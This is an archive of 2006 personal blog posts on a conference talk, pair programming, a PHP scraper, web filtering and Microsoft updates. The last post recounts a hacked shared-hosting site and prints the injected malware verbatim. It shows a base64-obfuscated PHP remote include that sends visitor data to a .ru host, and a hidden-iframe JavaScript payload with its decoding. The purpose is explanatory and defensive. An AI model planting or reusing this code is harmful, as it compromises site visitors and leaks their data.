Building an Asynchronous Multiuser Web App for Fun … and Maybe Profit

July 26th, 2006

Here are the slides for my talk today.

I will put up a cleaner version of the code in a couple of weeks, but here is today’s version. It comes with an ironclad guarantee about its bug-free status. I just won’t tell you exactly what I am guaranteeing.
poker.pdf
poker_0.1.zip
The mysqldump of the database

OSCON

July 22nd, 2006

OSCON06

This year I am doing a tutorial (with Laura) called Building an Asynchronous Multiuser Web App for Fun … and Maybe Profit and a session called Measuring Open Source Popularity.

OSCON is always great, and I don’t imagine this year will be an exception.

Combustible Dells

June 29th, 2006

I thought it was funny to see Greenpeace congratulating Dell for agreeing to phase out “all types of brominated flame retardents” in the same week as The Inquirer published photos of a Dell laptop exploding fairly spectacularly.

According to Greenpeace, most computer users are willing to pay extra for a “greener” computer. I wonder if they are willing to pay extra for a computer that does not burst into flames too?

Dell Configurator

Pair Programming

March 8th, 2006

This pair programming study was being passed around at work, which always sends a chill down my spine.

In case you are not familiar with this confronting practice,

The official definition of pair programming is two programmers working together, side by side, at one computer collaborating on the same analysis, design, implementation, and test. In other words, consider it like two programmers using one pencil.

The main thrust of the paper is that, working as a pair, each programmer achieved 227% of the average level of output in the organisation. Fascinating stuff, but not without its difficulties. I am not convinced that lines of code is a meaningful way to measure programmer productivity. I suspect that the average programmer might easily double their output by this measure just by being told that the lines of code they commit are being tallied.

By this measure I should have been paying to come to work this month. My main task has been refactoring about 6000 lines of code into about 2000 lines of code. I appear to have been doing negative amounts of work.

But that is all a side note. I was much more fascinated by the effect of pair programming on error rates. The summary data is helpfully provided as an image of a table. Errors decreased by three orders of magnitude.

Which sounds great, but think for a minute what that means. The author chooses not to disclose the normal error rate for solo programmers in the organisation, except to say that it was in line with the industry at the time. One data point given though is that a 10000 line task delivered by pairs had only two coding errors and one design error. That sounds pretty good to me … but if the pairs were producing 0.001 times the errors of solo programmers as the study claims, then solo programmers would have been expected to deliver 2000 coding errors and 1000 design errors in the same 10000 line task.

One coding error per five lines of code, and one design error per ten lines of code seems highly improbable to me, unless each pair consisted of one programmer doing 80% of the work and one rhesus monkey who without supervision would have just bashed keys randomly. Today of course, people would probably assume the output produced by the monkey was a valid Perl program, but as Perl had not been invented when the experiment was conducted I guess they spotted them as errors.
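As a rough check of that arithmetic, here is a minimal sketch. The function names are made up for illustration, and it assumes "three orders of magnitude" means exactly a factor of 1000, applied to the 10000 line task quoted from the study.

```php
<?php
// Hypothetical helpers for checking the figures quoted above.

// If pairs made $pairErrors errors and solo programmers make $factor
// times as many, this is the error count implied for solo programmers.
function impliedSoloErrors(int $pairErrors, int $factor): int
{
    return $pairErrors * $factor;
}

// How many lines of code there are per error, rounded down.
function linesPerError(int $lines, int $errors): int
{
    return intdiv($lines, $errors);
}

$lines  = 10000; // size of the task quoted in the study
$factor = 1000;  // assumption: "three orders of magnitude" taken literally

$soloCoding = impliedSoloErrors(2, $factor); // pairs: two coding errors
$soloDesign = impliedSoloErrors(1, $factor); // pairs: one design error

printf("Implied solo coding errors: %d, one per %d lines\n",
       $soloCoding, linesPerError($lines, $soloCoding));
printf("Implied solo design errors: %d, one per %d lines\n",
       $soloDesign, linesPerError($lines, $soloDesign));
```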

I remain unconvinced, and cannot think of pair programming without thinking of the PairOn chair … with apologies to Cenqua, who I stole the image from, and to Herman Miller, who they stole that icon of the dot com bubble, the Aeron, from.

PairOn

OfficePirates.com - Calling all slackers

March 1st, 2006

OfficePirates.com is an interesting venture*. They are aimed specifically at the 21-34 year old, male, office worker who hates his job and spends more time surfing the web than working demographic. Did you know that was a demographic? Now I will admit it is not quite like one of those job ads you sometimes read that say “To be considered, the applicant should have between 4.3 and 4.32 years C++ experience, like french fry sandwiches and be named Bob,” but it still seems fairly specific to me.

Of course, in time honoured Web 2.0 style, viral marketing is a big part of the plan. Their hordes of office slackers are, as we speak, supposed to be emailing each other to say “Have you seen the Girls in Bras video? It is hilarious.”

There are a few small problems with the plan though: the video is not hilarious, and the people behind it seem to have only a passing familiarity with some standard internet practices. For example, the comment field in their blog looks like this whenever I look at it:

Closed?

Did you use to think the internet operated 24 hours a day? So did I. I am not even sure what time zone that 9-6 is in, but apparently there is only one.

Some of their stuff is quite good. I liked Half day man, and they have money and a marketing budget behind them so being initially a bit thin on content will presumably be easy to solve, but it is hard to run a major website when you don’t seem to understand the genre conventions and when parts of your technology suck. I hate the Flash video player they are using. It does not cache content, so if your connection struggles you can’t pause and wait for the download to catch up. You just have to watch it stutter.

I also keep seeing [an error occurred while processing this directive]. What is that? A server side include error message, or an error message from an early version of ASP? How very Web 1.0.

* and I am not only saying that because I own lots of their stock on Alexadex, or because they have a really cool logo

Update: OfficePirates.com was shut down on September 1 after failing to find an audience. Personally, I only noticed six months later because I had a broken link.

Internet Filtering is Dumb

February 28th, 2006

This is not a new story, but the topic of internet content filtering comes up from time to time, so I wanted to post this picture while I remember where it is.

Dumb Internet Filtering

From time to time, somebody suggests that filtering internet content at various points would be a good idea. Invariably, the argument behind it is “Think of the Children. Who is looking out for our children?”

There are all sorts of reasons why the concept is flawed, but one big gaping problem that most people seem to ignore is that filtering software is dumb. Human classifiers would make errors, but manual classification cannot possibly cope with the volume of existing and new content, so filtering software has to try to classify material based on a set of rules. This is always going to fail, both passing content that will offend and blocking inoffensive, important content.

This is not a very sharp photo, but it is the screen of a public internet terminal. The site I am attempting to view in my own twisted, lascivious way is http://tickets.amtrak.com/. Now instead of the pictures of train timetables without any clothes on that I was expecting to see, I get, “This page has been blocked by the Content Filter because it may contain adult content not suitable for a public environment”.

Who is looking out for our adults? Whether they are (relatively) clean living tourists trying to buy a train ticket from Portland to Seattle, or whether they are anorak wearing, trainspotting weirdos who get a perverse kick from looking at Amtrak fare information does not really matter. Adults should be free to look at this and similar transport related “adult content” without having to apply for permission.

On a related note, because filtering software is so dumb, parents should not allow themselves to be lulled into a false sense of security thinking that a machine is doing their job for them. Do you know where your teenager is now? At this very minute, they could be perusing a hard core bus timetable, or even scouring the net for uncensored videos of 747s taking off.

Fun with Alexadex

February 27th, 2006

In case you are not aware, Alexadex is a virtual stock market game, where the values of stocks depend on their Alexa reach ratings.

Because I have too much time on my hands, I wanted to track my portfolio value in the sidebar of my blog. Look over there somewhere --> and you will probably see it.

In case it holds amusement value to somebody, here is the code. It relies on PHP and MySQL and just does some simple screen scraping.

The fact that this URL works:
http://alexadex.com/ad/api?&method=getQuote&url=lukewelling.com
hints that there might be an API to do this at some point, but for now, I am screen scraping. (url pulled from Cal Evans’ blog)

The database table looks like this:

CREATE TABLE alexadex (
  timestamp timestamp(14) NOT NULL,
  value int(11) NOT NULL default '0',
  PRIMARY KEY  (timestamp)
)

From a cron job I am running:

<?php
require('functions.php');

connectToDb();

$username = 'tangledweb';
$url = "http://alexadex.com/ad/user/$username";
$marker = 'total:</b></td><td align=right>$';

$current =  scrape( $url, $marker );
if($current!==false)
{
   echo "stored: ";
   storeCurrent($current);
}

echo $current; 

?>


In case it is not obvious, my Alexadex username is tangledweb.

In my blog sidebar I have:

<?php
require('functions.php');
echo '<li><a href = "http://alexadex.com/ad/user/tangledweb"
      >My current portfolio is $';
$temp = getMostRecentFromDb();
echo number_format($temp['value']).'</a>';
?>

The functions these rely on are:

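function storeCurrent($value)
{
  // Force the scraped value to an integer before it goes into the SQL string.
  $value = intval($value);
  $sql = "INSERT
          INTO alexadex
          VALUES (NOW(), $value)";
  // Hand back the query result so a caller can check for failure.
  return mysql_query($sql);
}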

function getMostRecentFromDb()
{
  $sql = "SELECT *
          FROM alexadex
          WHERE 1
          ORDER BY `timestamp` DESC
          LIMIT 1";

  $result = mysql_query($sql);

  return mysql_fetch_array($result);
}

function scrape($url, $marker, $maxLength = 50)
{
  $page = file_get_contents($url);
  if($page === false)
  {
    return false;
  }
  $pos = strpos($page, $marker);
  if($pos === false)
  {
    return false;
  }
  $value= substr($page, $pos + strlen($marker), $maxLength);
  $value= str_replace(',', '', $value);
  $value= intval($value);
  return $value;
}

function connectToDb()
{
  $connection = mysql_connect("host",
                              "user",
                              "pass");
  mysql_select_db("dbname", $connection);
}

This code comes with no warranty of any kind. You can have it as public domain, but I would appreciate a link to this blog if you use it. I hope it still works. WordPress seems to really, really want to mess with it when it saves it.
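The scrape() function above fetches and parses in one step, which makes it awkward to try out without hitting the site. As a minimal sketch, the parsing half can be pulled out and run against a string. The function name and the sample HTML are made up for illustration, and unlike the original this version returns false rather than 0 when no digits follow the marker, so a layout change is not stored as a worthless portfolio.

```php
<?php
// Hypothetical helper: the parsing half of scrape(), separated from the fetch.
// Returns the integer found right after $marker, or false if the marker
// is missing or is not followed by a number.
function extractValueAfterMarker(string $page, string $marker, int $maxLength = 50)
{
    $pos = strpos($page, $marker);
    if ($pos === false) {
        return false;
    }

    // Look only at the first $maxLength characters after the marker.
    $tail = (string) substr($page, $pos + strlen($marker), $maxLength);

    // Require a leading run of digits, optionally with thousands separators.
    if (!preg_match('/^\d[\d,]*/', $tail, $matches)) {
        return false;
    }

    return intval(str_replace(',', '', $matches[0]));
}

// Invented sample markup built around the marker used in the cron job.
$marker = 'total:</b></td><td align=right>$';
$sample = '<tr><td><b>total:</b></td><td align=right>$1,234,567</td></tr>';

var_dump(extractValueAfterMarker($sample, $marker));
```

With this split, scrape() would only need to call file_get_contents() and pass the result along.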

Microsoft vs. Spyware

February 27th, 2006

OK, I realise that whining about Microsoft is about as passé as whining about taxation, and about as likely to have any effect, but some similarities struck me the other day.

I was cleaning up some spyware or something from some of my websites and I thought it would be a good idea to make sure that all my Windows machines had the Microsoft patch for the WMF vulnerability. Start Windows Update running, click through the defaults, ignore the 792 page EULA and download what Microsoft classifies as “Critical Updates”.

One of the things people hate most about spyware, adware and their associated inbred toolbars and whatnots is that they use deceptive means to fool people into installing them. They either outright lie, or they provide one attractive feature and embed permission to do whatever else in an incomprehensible 792 page EULA.

Some large software companies behave in a remarkably similar way. What I requested from Microsoft, and what it was implied I was getting, was critical security updates. What I got instead was something called “Windows Genuine Advantage”. Now Bill and I clearly have different ideas about what is critical. To me, something that as far as I can tell just allows Microsoft to check if a computer is running a legal copy of Windows is not critical. In fact it is not even desirable. The only reason I installed it was because the information provided was a mixture of misleading and too long to read in detail.

In the medium and long term, I think it works to everybody’s disadvantage. The last thing the world needs is more unpatched Windows machines connected to the internet. Regardless of whether they are unpatched because of owner inaction, or because Microsoft decided to stop providing patches to machines with serial numbers it dislikes, the end effect is the same: more zombie machines wasting bandwidth and probing others because they have been infiltrated through well known vulnerabilities.

The IT Crowd episode 6

February 27th, 2006

Now out, as long as you live in the UK of course.

It was only from hearing the ads in The Ricky Gervais Show recently that I realised it is pronounced “The It Crowd”, rather than “The I.T. Crowd”. Oh well.

Spyware and popups close to home

February 27th, 2006

It seems somebody, somewhere has a fine sense of irony. A few days ago I posted about a sleazy popup advertising vendor. Then on Sunday morning I looked at my blog to find that it had been altered and code had been inserted in numerous places to force downloads of a (presumably corrupt) WMF file from a website with a .ru extension.

My web host was really, really, remarkably useless, so I am a bit short on details. I think the most likely situation is that an automated script running somewhere on the shared web host was spidering from account to account and inserting its payload into files with .php or .html extensions wherever it found one writable by the webserver user.

There are a few obvious morals to this story.

  • There are scripts in the wild that target PHP sites on shared hosts. Be careful with yours.
  • Have as few files as possible writable by the webserver user on a shared host. I am sure you already knew this, but it can be hard because,
  • Writers of web apps, such as forums and blogs, require you to have some files and directories writable, so if you are choosing such software for a shared host see if you can find ones that require as few writable files as possible, and
  • No matter how low your expectations are for the quality of support you expect from a crappy <$10 per month web host, it is always possible for those expectations to be exceeded.

If you have rarely checked stuff sitting on a shared host, it would be worth grepping for some distinctive code from the injected payload (perhaps “error_reporting(0)”) to make sure you are not in the same boat.
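If grep is not available on the host, the same check can be sketched in PHP. This is a minimal sketch, not a malware scanner: the function name is made up for illustration, it only looks at .php and .html files (the extensions the payload seemed to target), and a match on “error_reporting(0)” only means the file deserves a look, since legitimate code can contain that call too.

```php
<?php
// Hypothetical helper: list the .php and .html files under $root whose
// contents include $needle. A hit is a file to inspect, not proof of infection.
function findFilesContaining(string $root, string $needle): array
{
    $hits = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );

    foreach ($files as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $ext = strtolower($file->getExtension());
        if ($ext !== 'php' && $ext !== 'html') {
            continue;
        }
        // Skip files that cannot be read rather than aborting the scan.
        $contents = @file_get_contents($file->getPathname());
        if ($contents !== false && strpos($contents, $needle) !== false) {
            $hits[] = $file->getPathname();
        }
    }

    sort($hits);
    return $hits;
}

// Example use, assuming the site lives under the directory given:
// print_r(findFilesContaining('/path/to/site', 'error_reporting(0)'));
```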

The whole situation of course serves to make Aussie Hero Dale Begg-Smith all the more lovable in my eyes. For anybody who does not understand why people hate these sorts of business practices and the arseclowns that practise them, it is because they make their money at the expense of wasting other people’s time. I spent half of my Sunday cleaning up this mess, and still have a few more domains to fix now (Monday night).

In case anybody is curious, the code generally looked like this:

error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".
base64_encode($g).".".base64_encode($h).".".base64_encode($n);
if((include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str)))
{}
else {
include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}

or


<script language="javascript" type="text/javascript">
var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@ %kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@ 4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';
while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}

which un-obfuscated is:
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe
src="http://user19.iframe.ru/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1
marginwidth=0 marginheight=0 scrolling=no></iframe></div>
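Both layers of obfuscation above can be undone without running any of the injected code. As a minimal sketch: the PHP payload just base64 encodes its host name, and the JavaScript adds 3 to every character code, so subtracting 3 reverses it. The function name shiftDecode is made up for illustration, and only the start of the JavaScript string is decoded here.

```php
<?php
// Hypothetical helper: reverse the "add 3 to every character code" trick
// by subtracting the offset from each byte of the string.
function shiftDecode(string $encoded, int $offset = 3): string
{
    $decoded = '';
    $length = strlen($encoded);
    for ($i = 0; $i < $length; $i++) {
        $decoded .= chr(ord($encoded[$i]) - $offset);
    }
    return $decoded;
}

// The two base64 strings from the PHP payload, decoded but never included.
$includeTarget = base64_decode('aHR0cDovLw==')
               . base64_decode('dXNlcjcucGhwaW5jbHVkZS5ydQ==');
echo $includeTarget, "\n";

// The opening characters of the string k from the JavaScript payload.
echo shiftDecode('?gly#vw|oh@%ylvlelolw|=#klgghq>'), "\n";
```

Decoding by hand like this is safer than pasting the script into a browser to see what it writes.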

In one file I also found:

<a href = "http://mrsnebraskaamerica.com/catalog/images/sierra/hackmai-2.0.shtml" class=giepoaytr title="hackmai 2.0">hackmai 2.0</a>

There were also assorted files with generic sounding names created, like date.php and report.php, and .htaccess files were created or added to so that 404s were directed to the new bogus files.